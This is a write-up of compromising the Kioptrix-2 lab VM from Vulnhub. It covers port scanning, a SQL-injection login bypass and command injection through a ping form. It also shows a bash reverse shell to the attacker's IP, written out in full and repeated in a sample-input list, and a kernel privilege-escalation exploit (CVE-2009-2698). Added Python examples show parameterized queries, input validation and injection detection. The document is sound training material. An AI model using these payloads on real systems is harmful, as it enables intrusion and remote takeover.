Welcome to the Kioptrix-2 writeup from Vulnhub.
I hope you enjoy reading it. Any feedback is appreciated! @x4v1l0k


Kioptrix-2

tags: Vulnhub Easy Linux OSCP
Platform: Vulnhub
Difficulty: Easy
OS: Linux

Kioptrix: Level 1.1 (#2)

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T4 -p- 172.20.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 21:35 CEST
Nmap scan report for 172.20.10.7
Host is up (0.0016s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
792/tcp  open  unknown
3306/tcp open  mysql
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,111,443,631,792,3306 172.20.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 21:38 CEST
Nmap scan report for 172.20.10.7
Host is up (0.00032s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            789/udp   status
|_  100024  1            792/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2021-06-30T16:28:42+00:00; -3h09m41s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
792/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -3h09m41s

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 172.20.10.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.24 seconds

Port 80

On the website served on port 80 we find an authentication form.

Knowing that MySQL is installed on the server, as we saw in the Nmap scan, we try the classic injection ' OR '1'='1.

And we are in!
We now find a form that lets us ping an IP address.
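As an added illustration (not the VM's own login code), here is the difference between the string-built query that the bypass above relies on and a parameterized one; sqlite3 stands in for the MySQL server seen in the scan, and the user row and the sqli heuristic are constructed for the example.

```python
import re
import sqlite3

PAYLOAD = "' OR '1'='1"  # the bypass string used on the login form above

def make_db():
    """Constructed in-memory stand-in for the application's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return con

def login_vulnerable(con, username, password):
    """Query built by string concatenation: the quote in the payload closes the
    literal and the OR makes the WHERE clause true for every row."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone() is not None

def login_safe(con, username, password):
    """Parameterized query: the payload is bound as a plain value and matches nothing."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None

# Crude detection heuristic (assumed, not from the page): a quote followed by OR/AND and a comparison.
SQLI_HINT = re.compile(r"'\s*(or|and)\s*'?\s*\w*\s*'?\s*=", re.IGNORECASE)

def looks_like_sqli(value):
    """Flag a submitted field that carries the tautology pattern; tune before use on real traffic."""
    return bool(SQLI_HINT.search(value))

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, "admin", PAYLOAD))  # True
    print("parameterized:", login_safe(con, "admin", PAYLOAD))    # False
    print("flagged:", looks_like_sqli(PAYLOAD))                    # True
```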

Exploitation

To test whether we can inject commands, we submit the local IP with the id command appended after a semicolon: 127.0.0.1;id.

127.0.0.1;id

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.010 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.014 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.043 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.010/0.022/0.043/0.015 ms, pipe 2
uid=48(apache) gid=48(apache) groups=48(apache)
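As an added example (not the VM's ping handler), the pattern behind the injection above beside a hardened version and a simple detection check. The shell metacharacter list and the sample submissions are constructed for the example; the hardened function only builds the argv list, which you would hand to subprocess.run without shell=True.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Characters the shell treats specially; none of them belong in a host field (assumed list).
SHELL_META = re.compile(r"[;&|`$()<>\n]")

def vulnerable_command(host):
    """The pattern behind the RCE seen above: the field is pasted into a shell
    command line, so ';id' after the address becomes a second command."""
    return f"ping -c 3 {host}"

def is_valid_ping_target(host):
    """Allow-list check: the value must parse as an IP address and nothing else."""
    try:
        ipaddress.ip_address(host.strip())
        return True
    except ValueError:
        return False

def safe_ping_argv(host):
    """Hardened form: validate first, then build an argv list so no shell parses the value."""
    if not is_valid_ping_target(host):
        raise ValueError("ping target must be a literal IP address")
    return ["ping", "-c", "3", str(ipaddress.ip_address(host.strip()))]

def injection_attempts(form_values):
    """Detection: URL-decode each submitted value and return those carrying shell metacharacters."""
    hits = []
    for raw in form_values:
        value = unquote_plus(raw)
        if SHELL_META.search(value):
            hits.append(value)
    return hits

# Constructed sample submissions using the two payloads shown in this writeup.
SAMPLE_INPUTS = [
    "127.0.0.1",
    "127.0.0.1%3Bid",
    "127.0.0.1;bash -i >& /dev/tcp/172.20.10.4/8787 0>&1",
]

if __name__ == "__main__":
    print(injection_attempts(SAMPLE_INPUTS))
```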

We have RCE; let's go for a shell!

We start a listener in a terminal and submit the form with our reverse shell as the payload.

127.0.0.1;bash -i >& /dev/tcp/172.20.10.4/8787 0>&1

We wait a few seconds...

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.7] 32769
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$

And we have a shell as apache!

Post exploitation

Privilege escalation: apache to root

Enumeration

Linux Exploit Suggester 2

bash-3.00$ perl linux-exploit-suggester-2.pl 

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6.9
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] exp.sh
  [3] half_nelson1
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [4] half_nelson2
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [5] half_nelson3
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [6] krad
  [7] krad3
      Source: http://exploit-db.com/exploits/1397
  [8] pktcdvd
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [9] py2
  [10] sock_sendpage
      Alt: wunderbar_emporium       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9435
  [11] sock_sendpage2
      Alt: proto_ops       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9436
  [12] udp_sendmsg_32bit
      CVE-2009-2698
      Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
  [13] video4linux
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024

Since the suggester matches the local kernel 2.6.9 against udp_sendmsg_32bit, we go with CVE-2009-2698.

Exploitation

CVE-2009-2698

The link the script offers does not work at the moment, but the exploit is easy to find online by searching for its name or the CVE, for example at this link.

bash-3.00$ gcc udp_sendmsg_32bit.c -o 0x82-CVE-2009-2698 && ./0x82-CVE-2009-2698
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#

And that's all folks!